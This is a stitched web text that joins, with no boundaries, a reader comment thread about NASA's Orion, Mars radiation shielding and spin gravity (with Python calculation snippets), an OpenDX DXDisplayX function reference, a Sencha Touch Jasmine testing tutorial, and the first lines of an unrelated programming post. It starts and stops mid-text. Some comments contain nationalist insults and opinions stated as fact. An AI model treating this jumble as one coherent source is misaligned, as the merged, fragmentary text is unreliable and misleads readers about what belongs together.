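print(one_way_delay_min(54.6e6))   # ~3 minutes at closest approach
print(one_way_delay_min(401e6))    # ~22 minutes near maximum range
```

So a rover driver's round-trip "see result, send next command" loop ranges from roughly 6 to 45 minutes, which is why command sequences are sent in long batches.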
Any humans on Mars surface will need to limit their time outside of the shelter due to radiation concerns, so spending many hours to walk or drive more than a few miles would be very risky for NASA to allow. And by the mid-2030’s when the mission might go, we’ll know a lot about Mars from the robotic missions. It is quite unlikely sending humans there would add anything objectively useful to understanding of Mars.
We could do 20-30 of these robotic missions and even a few sample return missions for the price tag of a single manned mission to Mars, if it can even be done. The money would be much better spent exploring the entire solar system with robotic missions for the cost of one manned Mars mission.
So going to Mars with people will not be about science. It will be about hubris, an emotion. That’s it. And the astronauts if they survive and return will likely be facing a seriously shortened life span due to steady irradiation of their heart and CNS by GCR relativistic particles.
Joel,
You simply don’t understand the human spirit. We will learn how to deal with the lethal environments off planet. A permanent return to the moon is the second toddling step we must take to learn, survive, and thrive ‘out there’. A manned Mars mission exceeds our current capabilities. ‘First you crawl. Then you walk. Finally, you learn to run.’ The moon, looming just beyond our ancestral cradle, is where we will learn to crawl and walk outside the protective geomagnetosphere of earth. It’s in our genes! It’s what we do!
As for your baseless assertion that I “simply don’t understand the environment any humans would be dealing with once outside of Earth’s geomagnetosphere”, I’ll simply tell you that you are wrong … yet again. Ad hom attack – shame on you!
AMEN!
Until and unless we solve the problems with radiation exposure, there is no real reason to send humans beyond the moon. We should be working on next generation robots instead.
The rocket is useful – we can send robot explorers further and faster (and heavier) – but the capsule is a waste of time and money. The orbiting space station is mostly a waste of money. It is so much cheaper to send machines in place of humans.
You can solve the gravity problem, just build a fat enough circular crew quarters and spin it. You can grow food, produce oxygen, recycle wastes and water. What we can’t do as yet is bring down radiation levels to an acceptable risk for long term space travel – until you solve that problem the rest is useless beyond the Moon.
It will require (at least) two things – thick shielding likely made of multiple layers of stuff, including ice-water, and a powerful magnetic field around the ship to try and redirect a lot of the particle radiation.
Another breakthrough would be to put people into a controllable coma for the trip, and seal them into a highly shielded room. Yep, they would be cooking when awake and outside the room, but the majority of the travel would be in the shielded room.
So yes, the capsule looks cool. But it isn’t really getting us closer to planetary travel, at least not safely.
Yes deep space radiation is an issue. So are all of the other items you listed. We currently cannot keep even an Earthbound eco-habitat operational, let alone one that doesn’t have gravity to keep things in place.
Artificial gravity from rotation leaves a lot yet to be resolved as well. Huge radial distances are needed to keep the rotational speeds low. With smaller structures you need very high rotational speeds, and that leads to non-uniform gravity gradients measurable over the scale of the human body. When standing, the gravity at your head would be less than at your feet (think amusement-park ride inducing nausea), and the trajectory of falling objects will be an arc.
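The head-to-foot gradient works out to simply body height divided by spin radius, which shows why small habitats are so uncomfortable. A small sketch (the radii and spin rates are illustrative, not from any proposed design):

```python
import math

# Centripetal "gravity" a = omega^2 * r in a spinning habitat, and the
# head-to-foot gradient for a ~2 m tall person standing feet-outward.
def spin_gravity(radius_m, rpm):
    """Floor-level acceleration in m/s^2 at the given radius and spin rate."""
    omega = rpm * 2.0 * math.pi / 60.0
    return omega**2 * radius_m

def head_to_foot_gradient(radius_m, rpm, height_m=2.0):
    """Fractional reduction in apparent gravity at head vs. feet.
    Note omega cancels, so this is just height_m / radius_m."""
    g_feet = spin_gravity(radius_m, rpm)
    g_head = spin_gravity(radius_m - height_m, rpm)
    return (g_feet - g_head) / g_feet

# A small 5 m radius drum needs ~13.4 rpm for ~1 g, with a huge gradient:
print(spin_gravity(5.0, 13.4))            # ~9.85 m/s^2 at the floor
print(head_to_foot_gradient(5.0, 13.4))   # 0.4: 40% lighter at the head
# A 450 m radius ring at ~1.4 rpm keeps the gradient under half a percent:
print(head_to_foot_gradient(450.0, 1.41))
```

The gradient depends only on the ratio of body height to radius, so the only cure is a bigger structure, exactly the "huge radial distances" problem.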
As to radiation, surrounding the crew quarters with about 18″ of water and polyethylene tanks will suffice to stop deep space radiation.
18″ water shielding = 500 kg/square meter (0.5 metric tonne) shielding. Crew and living quarters, assume 2 independent living space spheres 4 meters in diameter = 2 x 50 sq meters = 100 sm surface area.
100 sm x 0.5 mt/sm = 50 tonnes of just the water shielding.
That’s 50 tonnes additional mass that would have to be accelerated out of low-Earth orbit on a Mars intercept, then decelerated on Mars arrival, and then accelerated again for the trip home.
You clearly have no idea how much chemical fuel for the thrust that would take just for the shielding.
And BTW, most radiation studies put the shielding necessary at around 1 full meter of water, or 1 mt/sm. So double your guess of 18″.
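To put numbers on that penalty, here is a sketch combining the areal-density shielding estimate above with the Tsiolkovsky rocket equation. The delta-v and specific impulse are assumed typical chemical-propulsion values, not figures from any specific mission:

```python
import math

# Water-shielding mass from areal density, plus the propellant penalty
# for pushing that mass from LEO onto a Mars transfer orbit.
def shield_mass_tonnes(area_m2, areal_density_t_per_m2):
    """Shield mass in tonnes for a given surface area and areal density
    (0.5 t/m^2 ~ 18 inches of water, 1.0 t/m^2 ~ 1 meter)."""
    return area_m2 * areal_density_t_per_m2

def propellant_per_tonne(delta_v_m_s, isp_s=450.0):
    """Tsiolkovsky rocket equation: tonnes of propellant required per
    tonne of payload, m_prop/m_payload = exp(dv/ve) - 1."""
    ve = isp_s * 9.80665  # exhaust velocity in m/s
    return math.exp(delta_v_m_s / ve) - 1.0

area = 100.0  # two ~4 m spheres, roughly 50 m^2 of surface each
print(shield_mass_tonnes(area, 0.5))  # 18" of water: 50 tonnes
print(shield_mass_tonnes(area, 1.0))  # 1 m of water: 100 tonnes
# Trans-Mars injection from LEO is roughly 3.6 km/s:
print(propellant_per_tonne(3600.0))   # ~1.3 t propellant per shield tonne
```

And that is just the outbound injection burn; the Mars capture and return legs each multiply the propellant bill again, which is the point about the shielding mass dominating the mission.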
The water is the fuel too, as hydrogen/oxygen. We just have to get extra water to space for the radiation protection, and I am surprised we are not by now blasting ice bullets out of chemical/electric rail guns in a mountain tunnel near the equator for cheap. Hitler had started building his proposed V-3 cannon, which was really just a 150 mm, 175-foot-long gun barrel with staged firing of accelerant. They were capable of firing shells up to 80 miles away, and would have been pounding London from France with them if the war hadn’t ended sooner. A Canadian was also developing this for Saddam in Iraq when, it is believed, the Israelis assassinated him. This tech would be great for blasting ice bullets or steel/aluminium ingots to space/orbit. Just don’t let the Gov’t do it or it will cost 10x as much.
Earthling2
July 3, 2019 at 7:56 pm
Yes, McGill University in Montreal was involved with this when I was there in the 1960s, called Project Martlet (or something similar). It used a huge gun (possibly ex-Nazi WWII) operating in Barbados to get the equatorial orbital boost. I think they fired at least one shot and the gun is still there rusting away. It might have been very useful to get water into orbit.
“That’s 50 tonnes additional mass that would have to be accelerated out of low-Earth orbit on a Mars intercept, then decelerated on Mars arrival, and then accelerated again for the trip home.”
Or we could use Buzz Aldrin’s Mars Cycler design for travel between Earth and Mars. The Mars Cycler is put into an orbit that intercepts both the Earth and Mars. Once put on this trajectory, the cycler will stay in this orbit without further need for large amounts of propellant.
As the Mars Cycler approaches Earth orbit, an orbital transfer vehicle meets it and transfers crews and equipment back and forth. Once the Mars Cycler reaches Mars orbit another orbital transfer vehicle will meet it and transfer the crew and equipment to where the Mars base is located.
If we wanted artificial gravity on the trip to and from Mars, then we would use two habitat modules for our Mars Cycler, separated by a mile-long cable, and the modules would revolve about the center at a rate of one revolution per minute. This would produce artificial gravity (centrifugal force) in the habitation modules roughly equivalent to the gravity on the surface of the Earth.
That configuration ought to cut down on propellant use between Earth and Mars and would keep people safe from space radiation and would keep their bodies from deteriorating due to exposure to microgravity for long periods of time.
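As a quick check on the tethered-cycler numbers, the spin arithmetic for two modules on a mile-long cable at one revolution per minute works out close to Earth gravity (this is purely illustrative arithmetic):

```python
import math

# Artificial gravity for two modules on a spinning tether: each module
# sits half the cable length from the center of rotation.
MILE_M = 1609.344  # meters per mile

def tether_gravity_g(cable_length_m, rpm):
    """Apparent gravity at a module, in Earth g."""
    radius = cable_length_m / 2.0
    omega = rpm * 2.0 * math.pi / 60.0     # spin rate in rad/s
    return omega**2 * radius / 9.80665

print(tether_gravity_g(MILE_M, 1.0))  # ~0.9 g: close to Earth gravity
```

So the mile-long cable at 1 rpm gives about 0.9 g; the cable would need to be slightly longer, or the spin slightly faster, to reach a full 1 g.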
“Until and unless we solve the problems with radiation exposure, there is no real reason to send humans beyond the moon.”
The solution is to use water ice as a radiation shield. A one-meter-thick coating of water ice on the outside of a habitat module will keep people inside safe from space radiation.
We are talking additional weight here with using water ice, but that’s manageable.
I flatly do not believe there is any economic justification for sending a human to Mars. The notion we are going to start living there is a propaganda dream designed to separate taxpayers from their hard earned income.
This does not mean I see no value in space exploration. In fact, I believe the exact opposite. We should move the money to robotic exploration. This will allow far greater diversity in our efforts. How many moons are there begging to be studied right now? Who cares if there may have been life on Mars. There may be life elsewhere right now. Let’s go look. Let’s also build telescopes. I love telescopes.
To the folks who say only a human can properly explore, I ask what about all the claims of Ai and deep learning? Or is that all just a bunch of BS too?
Robert, why send robots at all? Since we are never going to go why should we care what is out there?
/sarc
Harvesting asteroids for metals to return to Earth, though, is another story. No deep gravity well to deal with for retrieval. Robotics with nuclear-powered ion propulsion would be ideal to mine those, then use gravity-assist deceleration passes on Mars, Earth, and Venus to bring them back to 1 AU. Using robots you could take your time, like decades-long asteroid mining missions.
Unless there is a really big need for scarce materials on earth the best use of the materials we harvest (mine?) from space will be to keep them in space to manufacture things there. Don’t send them down the gravity well to Earth only to need to lift them back up again.
Many years ago there was a movie about a mission to an asteroid made of pure sapphire. Even then I asked “Don’t we have sapphires on Earth?” The cost to return the gems to Earth would be more than the gems were worth on Earth. Most materials are worth more in space, where they are needed.
+10!
Robert Goldman
July 3, 2019 at 11:29 am
The justification is that we need to have a plan B in case an asteroid or comet is coming our way that we can’t deflect. There could be a nuclear war wiping us all out on the Earth.
If we have a breeding colony of humans on Mars at least the species will survive unlike the dinosaurs. In any case the technology spinoffs will be immense, not to mention the inspiration to our youth. We all need goals; the loftier the better.
Mars is a truly inhospitable place. Atmosphere 99.4 % of the way to full vacuum. Like the moon program, a new generation of people in-the-know has forgotten the irrationality of the idea of space colonization as presently conceived, and won’t ‘get it’ until they see how much of GDP various people have spent on it so they can be public heroes.
Moon: A gazillion dollars to see some grey dust, with nothing in it.
Mars: A gazillion bazillion dollars to see some red dust, with nothing in it.
Return on investment: Minus gajillion.
Practical use: a few photos, and some grey and red dust (which Nasa will manage to lose some of, believe it or not).
Danger factor: severely high.
Not all expeditions have the same practical value. Just ask any oil or mineral geologist.
It’s interesting how superficial people are, isn’t it? The Moon *looks* like grey dust, it doesn’t even *look* as Earth like as Mars does in photos, so therefore “grey dust” is all there is to the Moon, obviously, look there, just a whole continent sized object made of grey dust!
In reality, while it’s clearly pretty useless to think of going all the way to the Moon just for materials we can get far more practically here on Earth, there *is* quite a lot more to the Moon than meets the eye! Besides potentially mineable iron content, say, there is also quite good evidence for mineable water at the lunar poles, and likely other volatiles (nitrogen compounds, say) as well.
All good stuff, *if* you think there is some sort of future for ‘in space’ industry, maybe a market for lunar derived rocket fuels for boosting satellites around, say?
You’ve obviously never done any mining.
I suppose I could always try to prove my great expertise to you by flying to the Moon tomorrow, so as to try to pan some water nuggets out of the bottom of Shackleton crater — or something.
Is that the kind of thing you had in mind?
Seriously, the Moon is a lot different than the Earth, there is no point at all in trying to drill a water well, say, and, any serious technology for extracting anything useful is going to be different than most of what we do here. Further, I see no guarantee that space industry will ever be big enough to really benefit from mining the moon, asteroids, etc. — *but*, something like that *may* happen eventually (space industry using ET materials, I mean).
(Hopefully the above caution is enough to cover the fact that I am off to the Moon tomorrow to get back to my regular job processing Lunar thorium for the Arcturians –
— Heigh Ho!).
Then we are all going to have to learn Mandarin and how to eat with chopsticks, just like if the German Nazis had won WW2 we would all be speaking German now.
Seeing how the Chinese treat other people, including themselves, and the way they trash the environment and other countries’ EEZs, such as their 7 artificial island military bases in the West Philippine Sea (South China Sea), I am all for our civilization taking over outer space and ensuring those barbarians are nowhere near the gates of outer space. Deny them entry to space if we have to, and I don’t care what it costs to ensure evil doesn’t take over the world. We are so lucky to have President Trump on that file, but even he may be too weak to arrest this long-term menace that humankind faces. Whoever rules space long term will rule the Earth. And I for one would much rather it be a western alliance than a red menace. This is really only the tip of the iceberg that this trade war is about.
I live overlooking Subic Bay, so I am delighted to read someone correctly naming the bit of ocean out my window – The West Philippine Sea. You can buy t-shirts here with that printed on the front.
The Chinese have set themselves the goal of building a working Solar Power Satellite in orbit by the year 2030.
As far as I know, NASA is doing little or nothing with regard to solar power satellites. I guess we can buy our power in orbit from the Chinese. If they will sell it to us.
NASA needs to build a demonstration Solar Power Satellite, preferably before the Chinese do, and NASA needs to build an Orbital Transfer Vehicle that is capable of operating in orbits between the Earth and the Moon. Basic space development infrastructure. NASA needs to get busy developing the things humans will need to operate and do business in space.
Trump has taken the first step by declaring the U.S. is going back to the Moon.
Here is an idea for a NASA Solar Power Satellite:
NASA should get themselves a large balloon and cover the outside of the balloon with solar panels in a manner that allows the balloon to be folded up for launch. Thin-film solar cells might be a good choice for this kind of setup.
NASA can launch the balloon into an appropriate orbit and could use a few pounds of helium to inflate the balloon to full size, and then the U.S. will have a working Solar Power Satellite. There won’t be any need to aim this SPS at the Sun because half of it will always be illuminated no matter which way it turns.
That shouldn’t be that difficult to do. I haven’t kept up with developments in the thin-film solar cell area but my understanding is they have been improved over the years. And I suppose a clever person might be able to figure out how to attach conventional solar cells to the outside if that were necessary.
I just like the simplicity of this design.
There are a lot of space entrepreneurs down on Earth thinking about how they can power the projects they have planned for orbit. I bet they would like to have an option to tap into a Solar Power Satellite.
A Solar Power Satellite could also be used to power vehicles and allow them to move around the Earth/Moon system. And if the Solar Power Satellite is big enough, it can be used to deflect dangerous asteroids.
I read the other day where a study was done about using nuclear weapons to deflect an asteroid, and the study found that even if the nuclear weapons broke the asteroid apart, the gravity of the asteroid would quickly reassemble the pieces, so a Solar Power Satellite may be our best bet at planetary defense.
NASA should get busy developing this technology.
Abbott: “develop this technology.”
..
Geez, buddy, there are already dozens of solar power satellites in geosynchronous orbit sending beams of microwave energy down to earth, powering people’s television sets.
…
Here is a picture of what people put on their roofs to collect this power:
…
Seems like you are trying to re-invent the wheel.
Solar power beamed down from geosynchronous orbit does have the nice feature in principle that the power beamed down can be almost full time. Not so much need, then, for attaching super sized battery clusters, which is one of the “fails” for ground situated solar cells.
Unfortunately, the whole prospect of converting to microwaves, beaming inefficiencies, the sheer cost initially of operating in space, etc., all of that *still* doesn’t seem too encouraging for the near future economics of power satellites! If, as I think, Global Warming isn’t much of a problem, why not just frack some natural gas, burn it for power — why even think of going for a more expensive space based idea?
Here is a thought, what about just putting really big mirrors in geosynchronous orbit, or attached to quite long, free flying, “skyhook” cables that orbit earth synchronously? Make the mirrors big enough and you don’t have to be concerned with converting to microwaves in space (then reconverting to electrical power from the microwaves, etc). Just send light down where needed, say for urban nighttime lighting — or for saving crops in the fall in rural areas, where said crops are in danger of premature freezing in autumn. Also, what about all those poor ground based solar cells, stuck in the dark overnight? Our space based mirrors, or “solettas” could help keep ground based solar powered up as well?
Anyway, this is just a thought, as I’ve no doubt there would be some kind of advanced engineering needed, to say the least, to build space mirrors as light in mass as possible, and still give them the required structural soundness, controllability, etc.
Earthling2,
Strategic thinking, in a comments list with very little of that. Nice!
Good. Now put it on top of Falcon Heavy and let’s go. Cancel the booster for SLS. Costs $500 million per launch versus Falcon Heavy $100M. NASA is just a jobs program for NASA and Boeing. And when Spacex debugs Dragon then retire Orion.
sky king
July 3, 2019 at 8:59 pm
Totally agree. However, why not retire Orion now as well as SLS, give some of the money to Musk and let him get on with Falcon Heavy and maybe BFR. To be fair maybe give some of the money to Bezos as well.
All the above commenters are right.
There is no good reason to explore space, no need for such technology.
We will just huddle here at the bottom of this gravity well and wait for the asteroid to come to us.
Well sarc off.
I thought Orion was the tag reserved for the Nuclear Bomb powered rocket.
J Mac @9:42 am says it best.
We need a challenge.
As to the hard radiation problem, one stopgap would be to send old men.
We have the skills and are well past our best before breeding days and reduced gravity would be a boon.
Those who worry about lives lost and explosive failures... bet you drive on the freeway without a thought.
The one certain thing about life is that it will kill you.
And as long as we huddle down here in the dirt, we know an asteroid will come, just not when, and currently there is nothing we can do about it.
Funny how the Cult of Calamitous Climate can get so worked up over a weak conjecture concerning a trace gas, yet a real climate-shattering, humankind-extinguishing event like an asteroid... Never mind.
Orion Project success!!!??? Nuclear propulsion!?
Oh… that… Well, that’s nice…. whatever…
By the time the Orion project makes it to the moon, colonists put there by Spacex will be waving as the craft descends.
Ernest Bush
July 4, 2019 at 10:09 am
Yes, along with their Chinese “comrades”. Only I doubt they will be waving.
It’s odd that NASA is re-using the old ‘Orion’ name. The original Project Orion was a 1950s idea for a spacecraft which used NUCLEAR BOMBS as fuel. The idea being to build the spacecraft on top of a massive plate, with shock absorbers, then set off a controlled (yeah, right) series of nuclear bombs under the plate. Larry Niven’s SF novel ‘Footfall’ used a clandestinely built ‘Orion’ to get into orbit and overcome an alien invasion. There was apparently a lot of work done on small nuclear bombs for this, and it’s all still classified.
Function
Displays an image in an X window.
Syntax
#include <dx/dx.h>
Object DXDisplayX(Object i, char *xdisplay, char *title)
Object DXDisplayX8(Object i, char *xdisplay, char *title)
Object DXDisplayX12(Object i, char *xdisplay, char *title)
Object DXDisplayX24(Object i, char *xdisplay, char *title)
Functional Details
Displays image i in an X window on the display specified by xdisplay, with the title specified by title. xdisplay is used as the X display string when opening the window. The window associated with xdisplay is maintained for subsequent calls to DXDisplayX until the user closes it, after which a new window is created.
These routines can utilize 8-bit pseudo color X visuals, 12-bit Direct Color and True Color visuals, and 24-bit Direct Color or True Color visuals.
DXDisplayX tries to create a window with the default visual, and if it is not of an appropriate type, tries to create an 8-bit, then 12-bit, then 24-bit visual. The other routines try to create the appropriate depth window first (for example, DXDisplayX8 tries to create an 8-bit window first, then tries the default window depth).
Return Value
Returns i or returns NULL and sets an error code.
See Also
DXMakeImage
16.9, "Image Fields".
Sencha Touch BDD
tl;dr
A multi-part series of articles on how to test Sencha Touch applications. It uses Jasmine for unit testing and Siesta for integration testing.
Part 1 – Getting Started
In this article you will learn how to set up a Sencha Touch application to run Jasmine tests.
Opinionated is a good thing
In my not-so-humble professional opinion, every modern web framework should provide a testing infrastructure with each newly generated application. I’m not concerned if it isn’t my preferred testing package. As long as there’s something. Testing is not an option, and the framework authors probably (hopefully?) test, so why not offer a serving suggestion for new projects? The worst that can happen is that you, the developer, disagree with the choice of framework. There’s a little extra bootstrap cost to replace one framework with another. That’s far less expensive than every new developer discovering a way to test.
Sencha Touch 2.1 has a generator built into its sencha command line tool, but it does not create a test structure as part of the template. This article is the first in a series of discoveries about how to test Sencha Touch applications. I am not claiming that this is the one true way to test. This is not necessarily the best way, either. It is, however, something that works. It installs easily on my development laptop. It gets you to your first passing test quickly. It saves you the cost of exploring all of the options and making these discoveries for yourself. You have plenty of other things to worry about.
But first, you need a web server
Once you’ve installed Sencha Touch and Sencha Command (3.1.0.256 when I wrote this), and you’ve generated the template application, you’ll need to serve the pages locally. Most projects will have some sort of app server already running, but it’s not strictly necessary for testing. When I need to serve pages on my own, I prefer pow. It is a zero-configuration server that can host as many applications as you please. I also like the powder ruby gem; it adds a nice command line interface to manage pow. If you are worried about adding a ruby dependency to your project, stop worrying. Sencha Touch uses the compass ruby gem to generate css files, so you already have a ruby dependency.
pow looks for a rack app, but in my sample app, I don’t have one. pow also looks for a directory named public from which it will serve static files. The simplest thing that works is to create a symlink named public that points to the root directory of the project.
# Generate a new ST app
$ cd <touch toolkit directory>
$ sencha generate app senchaBdd ~/workspace/sencha-bdd

# Set up pow/powder
$ cd ~/workspace/sencha-bdd
$ ln -s . public
$ powder up
$ powder link

# Test the server
$ open
If all goes well, you should be able to open the application in any web browser at
Install Jasmine
Installing the stand-alone version of Jasmine will work, but it doesn’t scale to hundreds or thousands of specs. That’s why the Jasmine gem was created. I did some more research and found a way to test using the Jasmine gem.
- In the root directory of your project, add rake and jasmine to your Gemfile:

$ cat Gemfile
source ""

group :development do
  gem 'rake'
  gem 'jasmine'
end
- Run bundle install
- Run jasmine init
- Jasmine will install a basic set up, but there's some cruft that you won't need for a Sencha application:

rm public/javascripts/Player.js
rm public/javascripts/Song.js
rm spec/javascripts/PlayerSpec.js
- Edit the src_files entry in spec/javascripts/support/jasmine.yml:

src_files:
  - touch/sencha-touch-all-debug.js  # Load Sencha library
  - spec/app.js                      # Load our spec Ext.Application
  - app/**/*.js                      # Load source files
- Create this file in spec/app.js:

Ext.Loader.setConfig({
    enabled: true,          // Turn on Ext.Loader
    disableCaching: false   // Turn OFF cache BUSTING
});

Ext.Loader.setPath({
    'SenchaBdd': 'app'      // Set the path for all SenchaBdd.* classes
});

Ext.application({
    name: 'SenchaBdd'       // Create (but don't launch) an application
});
- And this one in spec/javascripts/helpers/SpecHelper.js:

Ext.require('Ext.data.Model');

afterEach(function () {
    Ext.data.Model.cache = {};  // Clear any cached models
});

var domEl;
beforeEach(function () {
    // Reset the div with a new one.
    domEl = document.createElement('div');
    domEl.setAttribute('id', 'jasmine_content');
    var oldEl = document.getElementById('jasmine_content');
    oldEl.parentNode.replaceChild(domEl, oldEl);
});

afterEach(function () {
    // Make the test runner look pretty
    domEl.setAttribute('style', 'display:none;');
});
So, what’s going on here? Sencha Touch applications need Ext.Loader to manage class loading. You also need an Ext.Application, especially for controller tests. The modifications to jasmine.yml set up the proper load order, and the jasmine gem will find all of the source files underneath the app/ directory. The app.js is a customized version of your normal app.js that sets up the class loader and global namespace configuration. You should replace “SenchaBdd” with the real name of your application. Two things are happening in SpecHelper.js: first, by default Ext.data.Model caches every model created by the application in a global in-memory array. If you don’t clear it between tests, you can be surprised by test pollution. The second part is to set up and clear a space in the test runner for inserting DOM elements, usually for some sort of view testing.
Create a directory structure that matches your application’s
Your application’s directory structure should look something like this:
├── app
│   ├── controller
│   ├── model
│   ├── profile
│   ├── store
│   └── view
Modify the spec directory so that it mirrors the app/ directory:

├── spec
│   ├── app.js
│   └── javascripts
│       ├── model
│       ├── controller
│       ├── view
│       ├── store
│       ├── profile
Install Jasmine
You can get the stand-alone version from the Jasmine project site. Install it in the spec directory. I include the version number, so I can experiment with different versions, but that’s a matter of taste.
├── app
│   ├── controller
│   ├── model
│   ├── profile
│   ├── store
│   └── view
├── public -> .
├── resources/
├── spec/
│   ├── controller
│   ├── jasmine-1.3.1
│   ├── model
│   ├── profile
│   ├── store
│   └── view
└── touch
In order to get Jasmine going, you need a special html file named, by convention, SpecRunner. Add it to spec/ as well. It looks like this:
You will need to modify lines 18 and 22 with the name of your ST app (which can be found in app.json and app.js).
Write one passing test
Create a file, spec/javascripts/sanitySpec.js:

describe("Sanity", function() {
    it("succeeds", function() {
        expect(true).toEqual(true);
    });
});
Now load the spec runner into a browser. In the case of this sample app, the url is
Now start the Jasmine spec server from the command line:
bundle exec rake jasmine
And then open a browser window on
You should see the test results with one passing spec.
If you don’t see this, open up the browser’s developer console to look for clues.
Until next time
That’s it! You now have a complete JavaScript testing framework installed in your application. This is a good time to commit your changes. Celebrate in the glory of the green goodness. You’ve earned it.
Next time, I’ll show you how to test a model class.
Working in the same office as the authors (of Jasmine in this case) has its benefits. Apparently, I’m doing it all wrong. You can and should use the jasmine gem, which can load all of your source and library code into a stand alone web server. I’ll post a revision this week with the details.
April 21, 2013 at 12:07 pm
Fantastic article, even managed to follow it on Windows.
Two comments for other newbies like me…
1) Step 5 of ‘Install Jasmine’: “Ext.Application” is part of the comment on the row above. DON’T enter it on a new line, or it breaks, and you get a really useful error:
rake aborted!
(): could not find expected ‘:’ while scanning a simple key
2) It’s worth doing the “bundle exec rake jasmine” just after the “jasmine init” to check it’s all hanging together. I didn’t and couldn’t then tell if it was something I done wrong in the files (see 1) or a bad installation/missing components.
Now for Parts 2-5
July 12, 2013 at 8:00 am
How does one install the Jasmine gem on Windows? Or barring that (since I only have, and will only ever have, a single application) what does the SpecRunner.html file look like?
August 1, 2013 at 3:08 pm
It’s just a ruby gem, so if you can get a rack app running, then jasmine will run, too.
August 2, 2013 at 10:10 am
I found I needed to first install bundler before running ‘bundle install’ …
$ gem install bundler
September 18, 2013 at 8:07 pm | http://pivotallabs.com/sencha-touch-bdd-part-1/?tag=bloggerdome | CC-MAIN-2015-14 | refinedweb | 1,488 | 66.33 |
How to Create a Linked List in C Programming
In C programming, if you want to add a second structure to code you’ve already created, create a linked list — a series of structures that contain pointers to each other. Along with the basic data in a structure, the structure contains a pointer, which contains the address of the next structure in the list.
With some clever juggling of pointer names, plus a NULL to cap the end of the list, you might end up with something similar to the source code in A Primitive Linked-List Example.
A PRIMITIVE LINKED-LIST EXAMPLE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    struct stock {
        char symbol[5];
        int quantity;
        float price;
        struct stock *next;
    };
    struct stock *first;
    struct stock *current;
    struct stock *new;

    /* Create structure in memory */
    first=(struct stock *)malloc(sizeof(struct stock));
    if(first==NULL)
    {
        puts("Some kind of malloc() error");
        exit(1);
    }

    /* Assign structure data */
    current=first;
    strcpy(current->symbol,"GOOG");
    current->quantity=100;
    current->price=801.19;
    current->next=NULL;

    new=(struct stock *)malloc(sizeof(struct stock));
    if(new==NULL)
    {
        puts("Another malloc() error");
        exit(1);
    }
    current->next=new;
    current=new;
    strcpy(current->symbol,"MSFT");
    current->quantity=100;
    current->price=28.77;
    current->next=NULL;

    /* Display database */
    puts("Investment Portfolio");
    printf("Symbol\tShares\tPrice\tValue\n");
    current=first;
    printf("%-6s\t%5d\t%.2f\t%.2f\n",
        current->symbol,
        current->quantity,
        current->price,
        current->quantity*current->price);
    current=current->next;
    printf("%-6s\t%5d\t%.2f\t%.2f\n",
        current->symbol,
        current->quantity,
        current->price,
        current->quantity*current->price);
    return(0);
}
This source code is pretty long, but it simply creates a second structure, linked to the first one. Don’t let the source code’s length intimidate you.
Lines 13 through 15 declare the standard three structure pointers that are required for a linked-list dance. Traditionally, they’re named first, current, and new. They play into the fourth member in the structure, next, found at Line 11, which is a structure pointer.
Don’t use typedef to define a new structure variable when creating a linked list. A Primitive Linked-List Example doesn’t use typedef, so it’s not an issue with the code, but many C programmers use typedef with structures. Be careful!
The variable name new, used in Line 15, is a reserved word in C++, so if you want to be bilingual, change the variable name to new_struct or to something other than the word new.
When the first structure is filled, Line 30 assigns a NULL pointer to the next element. That NULL value caps the end of the linked list.
Line 32 creates a structure, placing its address in the new pointer variable. The address is saved in the first structure in Line 38. That’s how the location of the second structure is retained.
Lines 40 through 43 fill information for the second pointer, assigning a NULL value to the next element at Line 43.
The linking takes place as the structures’ contents are displayed. Line 48 captures the first structure’s address. Then Line 54 captures the next structure’s address from within the first structure.
Exercise 1: Type the source code from A Primitive Linked-List Example into your editor. Even though it’s long, type it in because you’ll need to edit it again later (if you’re not used to that by now). Build and run.
Unlike arrays, structures in a linked list are not numbered. Instead, each structure is linked to the next structure in the list. As long as you know the address of the first structure, you can work through the list until the end, which is marked by a NULL.
A Primitive Linked-List Example shows some sloppy source code with lots of repeated code. When you see multiple statements like this in your code, you should immediately think “functions.”
A BETTER LINKED-LIST EXAMPLE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ITEMS 5

struct stock {
    char symbol[5];
    int quantity;
    float price;
    struct stock *next;
};
struct stock *first;
struct stock *current;
struct stock *new;

struct stock *make_structure(void);
void fill_structure(struct stock *a,int c);
void show_structure(struct stock *a);

int main()
{
    int x;

    for(x=0;x<ITEMS;x++)
    {
        if(x==0)
        {
            first=make_structure();
            current=first;
        }
        else
        {
            new=make_structure();
            current->next=new;
            current=new;
        }
        fill_structure(current,x+1);
    }
    current->next=NULL;

    /* Display database */
    puts("Investment Portfolio");
    printf("Symbol\tShares\tPrice\tValue\n");
    current = first;
    while(current)
    {
        show_structure(current);
        current=current->next;
    }
    return(0);
}

struct stock *make_structure(void)
{
    struct stock *a;

    a=(struct stock *)malloc(sizeof(struct stock));
    if(a==NULL)
    {
        puts("Some kind of malloc() error");
        exit(1);
    }
    return(a);
}

void fill_structure(struct stock *a,int c)
{
    printf("Item #%d/%d:\n",c,ITEMS);
    printf("Stock Symbol: ");
    scanf("%s",a->symbol);
    printf("Number of shares: ");
    scanf("%d",&a->quantity);
    printf("Share price: ");
    scanf("%f",&a->price);
}

void show_structure(struct stock *a)
{
    printf("%-6s\t%5d\t%.2f\t%.2f\n",
        a->symbol,
        a->quantity,
        a->price,
        a->quantity*a->price);
}
Most linked lists are created as shown in A Better Linked-List Example. The key is to use three structure variables, shown in Lines 13 through 15:
first always contains the address of the first structure in the list. Always.
current contains the address of the structure being worked on, filled with data, or displayed.
new is the address of a new structure created by using the malloc() function.
Line 7 declares the stock structure as global. That way, it can be accessed from the various functions.
The for loop between Lines 25 and 39 creates new structures, linking them together. The initial structure is special, so its address is saved in Line 30. Otherwise, a new structure is allocated, thanks to the make_structure() function.
In Line 35, the previous structure is updated; the value of current isn’t changed until Line 36. Before that happens, the pointer in the current structure is updated with the address of the next structure, new.
At Line 40, the end of the linked list is marked by resetting the new pointer in the last structure to a NULL.
The while loop at Line 46 displays all structures in the linked list. The loop’s condition is the value of the current pointer. When the NULL is encountered, the loop stops.
The rest of the code shown in A Better Linked-List Example consists of functions that are pretty self-explanatory.
Exercise 2: Copy the code from A Better Linked-List Example into the editor. Build and run.
Take note of the scanf() statements in the fill_structure() function. Remember that the -> is the “peeker” notation for a pointer. To get the address, you must prefix the variable with an & in the scanf() function. | https://www.dummies.com/programming/c/how-to-create-a-linked-list-in-c-programming/ | CC-MAIN-2019-22 | refinedweb | 1,118 | 63.8 |
I'm a practical programmer. I don't like to over-optimize my code, and I want to make it very readable for the next person who needs to work with something that I wrote. Consequently, I sometimes leave alternate interpretations and access patterns into my code that might not always work as expected. A great example of this is the ability to pass
